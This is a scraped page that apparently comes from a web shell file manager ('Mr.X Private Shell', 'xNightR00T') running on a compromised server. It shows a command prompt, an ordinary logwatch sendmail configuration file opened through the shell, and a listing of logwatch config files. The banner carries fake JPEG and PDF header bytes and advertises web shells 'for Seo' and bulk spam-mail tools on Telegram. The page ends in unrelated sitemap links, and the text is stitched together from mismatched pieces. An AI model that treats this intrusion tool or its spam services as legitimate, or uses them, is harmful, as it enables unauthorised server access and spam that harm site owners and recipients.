xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
###########################################################################
# $Id$
###########################################################################

# You can put comments anywhere you want to.  They are effective for the
# rest of the line.

# this is in the format of <name> = <value>.  Whitespace at the beginning
# and end of the lines is removed.  Whitespace before and after the = sign
# is removed.  Everything is case *insensitive*.

# Yes = True  = On  = 1
# No  = False = Off = 0

Title = "sendmail"

# Which logfile group...
LogFile = maillog

# Only give lines pertaining to the sendmail service...
*MultiService = sendmail,sm-mta
*RemoveHeaders

# Previous versions of sendmail.conf allowed for the use of the
# $Sendmail_Detail variable.  Because now all services have use
# of the Detail variable, $Sendmail_Detail is deprecated, and may
# be removed in a future version of the sendmail filter script.
# How Detail affects the output of sendmail is described here:
#
# The Detail is used to override the general logwatch Detail
# parameter that is set either when invoking logwatch (option --detail)
# or specified in the conf/logwatch.conf file, in the variable Detail.
# If not specified, the default is to inherit the value of the general
# logwatch Detail setting.
#
# Example:
#Detail = 5
#
# The defined values of Detail are as follows:
# Detail >= 0: Will print:";
#                         - severe errors and basic statistics";
# Detail >= 3: Print above plus:";
#                         - counts of errors handled by sendmail";
# Detail >= 5: Print above plus:";
#                         - details of errors handled by sendmail";
# Detail >= 10: Print above plus:";
#                         - all statistics gathered";

# Note that Detail is independent of sendmail's LogLevel.
# The logwatch script should be able to handle any logging level
# set in sendmail (either through confLOG_LEVEL in the *.mc files
# or through LogLevel in the *.cf files).  The default setting is
# usually a LogLevel of 9.  At level 15, for example, SMTP
# transactions are logged, and the logwatch script extracts additional
# information.  Levels above 15 generate additional debug information,
# which is filtered by the logwatch script.  Therefore, setting higher
# levels of LogLevel will yield larger mail log files, may provide
# additional parsed information in the logwatch log, but should not
# cause new unmatched entries.

# All sendmail log statements that start with "DEBUG: " will be filtered.
# This may be used for user-defined statements that should appear on the log,
# but not reported by logwatch.

# $Sendmail_PrettyHost is used to format host entries in a tabular
# format.  It is mostly useful when you have a very large number of
# entries for errors that display host names/addresses.  If not
# specified, the default is 0, which indicates that no additional
# host formatting is done.  Set to 1 to enable the host formatting.
#$Sendmail_PrettyHost = 0


# The following are examples of the use of variables SendmailMatchFilter,
# Sendmail_ReportFilter, and $Sendmail_MilterHeadersToCount.
# To uncomment and use these specific examples, remember to remove the '#'
# from the first column. And of course, you can write your own filters.
# Note that unlike the statements in the sendmail script, you must end
# each line (except the last one) with a \ to denote a continuation line

#$Sendmail_MatchFilter = "                                                   \
#   # first we declare a scope for later use by Sendmail_ReportFilter        \
#   package MatchFilter;   						    \
#   our %DatabaseBuild;							    \
#   # filter and count how many times the alias database is rebuilt          \
#   if ( ($User) = ($ThisLine =~ /^alias database .* rebuilt by (.*)/ ) ) {  \
#      $DatabaseBuild{$User}++;                                              \
#      # note that we don't need to re-assign an empty string to $ThisLine   \
#      #   because the 'alias database' line is then ignored by the          \
#      #   scripts/services/sendmail script.                                 \
#   }                                                                        \
#                                                                            \
#   # here we'll choose to ignore and not report the 'lost input channel'    \
#   #   statements                                                           \
#   if ( $ThisLine =~ /^lost input channel from/ ) {                         \
#      # we re-assign an empty string to $ThisLine to prevent further        \
#      #   processing of this log line by the sendmail script.               \
#      $ThisLine = "";                                                       \
#   }"
#
#$Sendmail_ReportFilter =   "                                                \
#   if (keys %MatchFilter::DatabaseBuild) {                                  \
#      print "\n\nDatabase re-built by:";                                    \
#      foreach $User (keys %MatchFilter::DatabaseBuild) {                    \
#         print "\n    $User: $MatchFilter::DatabaseBuild{$User} Time(s)";   \
#      }                                                                     \
#   }"

# The $Sendmail_MilterHeadersToCount will count every header added with
#   one (or more) of the specified strings.  Each string is specified by
#   delimiting it with a vertical bar, and is counted separately:
$Sendmail_MilterHeadersToCount = "X-SPF|X-Spam|X-Scanned-By: MIMEDefang|Received-SPF: fail|Received-SPF: softfail"


#########################################################
# Sendmail Threshold values. 
# These allow you to configure the output and restrict verbose reports
# by limiting what is printed to occurances >= the value you enter.
#
# Note that case is insensitive.

#Sendmail Config Values
$sendmail_mailbomblistthreshold = 25
$sendmail_mailbombthreshold = 10
$sendmail_unresolveddomainsthreshold = 1
$sendmail_knownspammerthreshold = 1
$sendmail_relaydeniedthreshold = 1
$sendmail_checkmailrejectthreshold = 1
$sendmail_checkrcptrejectthreshold = 1
$sendmail_lostinputchannelthreshold = 1
$sendmail_dummyconnectionthreshold = 1
$sendmail_unknownhoststhreshold = 1
$sendmail_unknownusersthreshold = 1
$sendmail_domainerrorsthreshold = 1
$sendmail_pregreetingthreshold = 1
$sendmail_collecterrorthreshold = 1
$sendmail_timeoutthreshold = 1
$sendmail_blackholethreshold = 1

#Set this to Null to suppress the Top 10 Email Addresses
$sendmail_tolistthreshold = 10

########################################################
# Please send all comments, suggestions, bug reports,
#    etc, to logwatch-devel@lists.sourceforge.net
########################################################

# vi: shiftwidth=3 tabstop=3 et

Filemanager

Name Type Size Permission Actions
afpd.conf File 683 B 0644
amavis.conf File 7.31 KB 0644
arpwatch.conf File 693 B 0644
audit.conf File 1.22 KB 0644
automount.conf File 974 B 0644
autorpm.conf File 873 B 0644
barracuda.conf File 528 B 0644
bfd.conf File 452 B 0644
cisco.conf File 870 B 0644
citadel.conf File 1002 B 0644
clam-update.conf File 1.81 KB 0644
clamav-milter.conf File 571 B 0644
clamav.conf File 752 B 0644
courier.conf File 1.72 KB 0644
cron.conf File 867 B 0644
denyhosts.conf File 428 B 0644
dhcpd.conf File 962 B 0644
dirsrv.conf File 499 B 0644
dmeventd.conf File 1.21 KB 0644
dnssec.conf File 2.6 KB 0644
dovecot.conf File 1.02 KB 0644
dpkg.conf File 783 B 0644
emerge.conf File 645 B 0644
evtapplication.conf File 1006 B 0644
evtsecurity.conf File 997 B 0644
evtsystem.conf File 991 B 0644
exim.conf File 956 B 0644
eximstats.conf File 1.09 KB 0644
extreme-networks.conf File 892 B 0644
fail2ban.conf File 1.17 KB 0644
fetchmail.conf File 872 B 0644
freeradius.conf File 666 B 0644
ftpd-messages.conf File 1008 B 0644
ftpd-xferlog.conf File 962 B 0644
http-error.conf File 394 B 0644
http.conf File 3.39 KB 0644
identd.conf File 953 B 0644
imapd.conf File 904 B 0644
in.qpopper.conf File 987 B 0644
init.conf File 959 B 0644
ipop3d.conf File 850 B 0644
iptables.conf File 1.43 KB 0644
kernel.conf File 1.45 KB 0644
knockd.conf File 944 B 0644
lvm.conf File 911 B 0644
mailscanner.conf File 1006 B 0644
mdadm.conf File 620 B 0644
mod_security2.conf File 624 B 0644
modprobe.conf File 971 B 0644
mountd.conf File 965 B 0644
mysql-mmm.conf File 631 B 0644
mysql.conf File 154 B 0644
named.conf File 1.07 KB 0644
netopia.conf File 923 B 0644
netscreen.conf File 878 B 0644
oidentd.conf File 694 B 0644
omsa.conf File 544 B 0644
openvpn.conf File 748 B 0644
pam.conf File 956 B 0644
pam_pwdb.conf File 971 B 0644
pam_unix.conf File 892 B 0644
php.conf File 834 B 0644
pix.conf File 422 B 0644
pluto.conf File 303 B 0644
pop3.conf File 931 B 0644
portsentry.conf File 979 B 0644
postfix.conf File 12.33 KB 0644
postgresql.conf File 886 B 0644
pound.conf File 1.07 KB 0644
proftpd-messages.conf File 1.11 KB 0644
puppet.conf File 937 B 0644
pureftpd.conf File 966 B 0644
qmail-pop3d.conf File 1.76 KB 0644
qmail-pop3ds.conf File 1.76 KB 0644
qmail-send.conf File 1.97 KB 0644
qmail-smtpd.conf File 3.85 KB 0644
qmail.conf File 1.77 KB 0644
raid.conf File 170 B 0644
resolver.conf File 2.61 KB 0644
rsyslogd.conf File 312 B 0644
rt314.conf File 229 B 0644
samba.conf File 869 B 0644
saslauthd.conf File 926 B 0644
scsi.conf File 1.06 KB 0644
secure.conf File 1.53 KB 0644
sendmail-largeboxes.conf File 1.28 KB 0644
sendmail.conf File 6.63 KB 0644
shaperd.conf File 696 B 0644
slon.conf File 1.24 KB 0644
smartd.conf File 689 B 0644
sonicwall.conf File 956 B 0644
spamassassin.conf File 584 B 0644
sshd.conf File 1.79 KB 0644
sshd2.conf File 962 B 0644
sssd.conf File 523 B 0644
stunnel.conf File 824 B 0644
sudo.conf File 862 B 0644
syslog-ng.conf File 1007 B 0644
syslogd.conf File 968 B 0644
systemd.conf File 529 B 0644
tac_acc.conf File 569 B 0644
tivoli-smc.conf File 621 B 0644
up2date.conf File 881 B 0644
vdr.conf File 869 B 0644
vpopmail.conf File 758 B 0644
vsftpd.conf File 757 B 0644
windows.conf File 1.14 KB 0644
xntpd.conf File 992 B 0644
yum.conf File 87 B 0644
zypp.conf File 605 B 0644
zz-disk_space.conf File 1.77 KB 0644
zz-fortune.conf File 930 B 0644
zz-lm_sensors.conf File 1.08 KB 0644
zz-network.conf File 1.18 KB 0644
zz-runtime.conf File 684 B 0644
zz-sys.conf File 965 B 0644
zz-zfs.conf File 856 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml